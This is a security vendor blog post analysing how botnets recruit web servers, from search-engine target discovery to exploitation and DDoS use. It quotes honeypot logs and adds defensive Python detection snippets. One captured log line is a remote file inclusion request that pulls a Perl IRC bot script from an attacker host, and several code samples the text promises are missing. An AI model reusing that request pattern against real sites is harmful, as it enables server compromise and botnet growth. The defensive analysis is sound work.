SpiderLabs Blog

The Life Cycle of Web Server Botnet Recruitment

Mar 6, 2013 11:56:00 AM

This blog post is an excerpt taken from the recently released Global Security Report (GSR) for 2013.

Over the course of the past year, my team has monitored and analyzed vast amounts of data within our Web honeypots and shared intelligence in our [Honeypot Alert] blog posts. In this blog post, we want to illustrate the most common methods botnet owners use to compromise websites and make them part of their army. The data in this section shows examples of code snippets and log file entries from real captured attacks.

Why target web servers vs. infecting end-user computers? There are a number of factors that make web servers attractive targets for botnet owners:
  1. Web servers are always online, whereas home computer systems are often shut down when not in use. This makes the number of home-based bots under control at any one time variable. That matters to botnet owners because they frequently sell their botnet's services, and a reliable, consistently available botnet is key.
  2. Web servers have more network bandwidth than home computers. This is essentially a Quality of Service metric: commercial web servers are guaranteed specific amounts of network bandwidth, whereas home users typically have much less. Additionally, home user traffic is often throttled, which reduces the volume of DDoS traffic those systems can generate.
  3. Web servers have more horsepower than home computers. With more CPUs, more RAM, and so on, commercial servers can generate far more DDoS traffic than home systems.
  4. Web servers are less likely than home systems to be blacklisted by ISPs. This means web server zombies stay online, sending traffic, much longer than compromised home computers.
Essentially, web server botnet participants are like "Super Soldiers" compared to normal grunts in the botnet army.

Step 1: IRC botnet instructs zombies to search for targets

First, attackers identify potential target sites. While it is possible to methodically scan network ranges looking for targets, it is more efficient to use data already collected by legitimate search sites (e.g., Google, Bing, Yahoo). By using their built-in search capabilities, botnet operators can instruct zombies (previously compromised websites or home computer systems) to send custom search queries. Here is an example of the IRC botnet help interface that lists command options:

Here is a listing of the top web vulnerabilities that are targeted by botnet attackers:

If the attacker wants to execute an RFI (Remote File Inclusion) attack, the zombie executes this section of code:

Step 2: IRC botnet zombies conduct search engine queries

Zombie clients receive their search commands from the operator and use code to send requests to the various search engines. The results are then parsed to identify target websites that match the vulnerability search data.

Here is an example section of a Perl botnet client's code that lists various Search Engines to use:

And here is the section of code that sends the actual queries:

Step 3: IRC botnet instructs zombie to scan targets for vulnerabilities

Next, zombies verify the existence of the vulnerabilities in the target websites. Here is an example access_log entry:

 187.45.185.36 - - [06/Mar/2013:02:07:09 +0100] "GET /wp-content/themes/kingsize/timthumb.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" 
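Probes like this one are easy to surface on the defender's side. As an illustrative sketch (this is not part of the attacker's code; the log format and the list of probed paths are assumptions), a few lines of Python can flag access_log entries that request known-vulnerable components such as timthumb.php:

```python
import re

# Apache combined log format: capture source IP, request path, and status code.
LOG_PATTERN = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET ([^" ]+) HTTP/[\d.]+" (\d{3})')

# Illustrative list of frequently probed vulnerable components (assumed, not exhaustive).
PROBED_PATHS = ("timthumb.php", "thumb.php")

def find_probes(log_lines):
    """Return (ip, path) tuples for requests that look like vulnerability scans."""
    hits = []
    for line in log_lines:
        m = LOG_PATTERN.match(line)
        if m and any(p in m.group(2) for p in PROBED_PATHS):
            hits.append((m.group(1), m.group(2)))
    return hits

sample = ['187.45.185.36 - - [06/Mar/2013:02:07:09 +0100] '
          '"GET /wp-content/themes/kingsize/timthumb.php HTTP/1.1" 404 318 "-" "Mozilla/5.0"']
print(find_probes(sample))
# → [('187.45.185.36', '/wp-content/themes/kingsize/timthumb.php')]
```

Note that even the 404 responses are valuable reconnaissance data to the attacker: they tell the zombie which candidate sites to drop from the target list.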

Step 4: IRC botnet instructs zombie to exploit vulnerability & install botnet client code

These malicious requests attempt to trick the Web application into downloading code hosted on a remote, attacker-owned site. If the application is vulnerable, it downloads the file. In most cases that alone is enough, since the attacker can then access the file through a Web browser.

187.45.185.36 - - [06/Mar/2013:02:07:11 +0100] "GET /wp-content/themes/kingsize/timthumb.php?src=http://picasa.com.ritile.com/black.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
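Requests like the one above carry a tell-tale RFI signature: a query-string parameter whose value is a full URL pointing at a third-party host. As a defensive illustration (an assumed sketch, not the attacker's code; the hostname passed as `local_host` is a placeholder), such attempts can be flagged like this:

```python
from urllib.parse import urlparse, parse_qsl

def rfi_candidates(request_path, local_host="www.example.com"):
    """Return (param, value) pairs whose value is an absolute URL on a foreign host.

    local_host is a placeholder for the protected site's own hostname (assumed).
    """
    parsed = urlparse(request_path)
    suspicious = []
    for param, value in parse_qsl(parsed.query):
        target = urlparse(value)
        # An http(s) URL pointing anywhere other than our own host is a strong RFI signal.
        if target.scheme in ("http", "https") and target.netloc and target.netloc != local_host:
            suspicious.append((param, value))
    return suspicious

req = "/wp-content/themes/kingsize/timthumb.php?src=http://picasa.com.ritile.com/black.txt"
print(rfi_candidates(req))
# → [('src', 'http://picasa.com.ritile.com/black.txt')]
```

Notice the hostname in the captured attack: it begins with "picasa.com." precisely because TimThumb's domain whitelist used partial string matching, so a hostname that merely starts with a trusted domain could slip past the check.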

In this case, the black.txt file is a Perl IRC botnet client script that executes and then logs the compromised web server into the attacker's IRC channel:

The botnet owner then repeats this process over and over, amassing a huge army of compromised web servers.

Post-Recruitment Actions

A large botnet can perform many different tasks for its operator; the most prevalent at this point is initiating DDoS attacks as part of either hacktivist or for-profit campaigns. Here is an example "HTTPFlood" section of code:
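Whatever form the flood code takes, the traffic it produces has a simple shape: a burst of requests per second from each zombie. As a defender-side illustration (the function name, window size, and threshold are assumptions to be tuned per site, not values from the attack code), per-IP request counts can be bucketed to surface flood participants:

```python
from collections import Counter

def flood_suspects(entries, window=10, threshold=100):
    """entries: iterable of (epoch_seconds, ip) pairs from access logs.

    Returns the IPs that exceed `threshold` requests within any
    `window`-second bucket (both cutoffs are illustrative assumptions).
    """
    # Group requests into fixed time buckets per source IP.
    buckets = Counter((ip, ts // window) for ts, ip in entries)
    return sorted({ip for (ip, _), count in buckets.items() if count > threshold})

# Example: one zombie sends 150 requests inside a single 10-second bucket,
# while a normal visitor sends one request.
entries = [(1000 + i % 10, "203.0.113.7") for i in range(150)] + [(1000, "198.51.100.2")]
print(flood_suspects(entries))
# → ['203.0.113.7']
```

In practice this kind of rate signal is only a first-pass filter; compromised web servers sit on high-bandwidth links (one reason they are recruited, as noted above), so a flood can be damaging even when each zombie stays under a naive per-IP threshold.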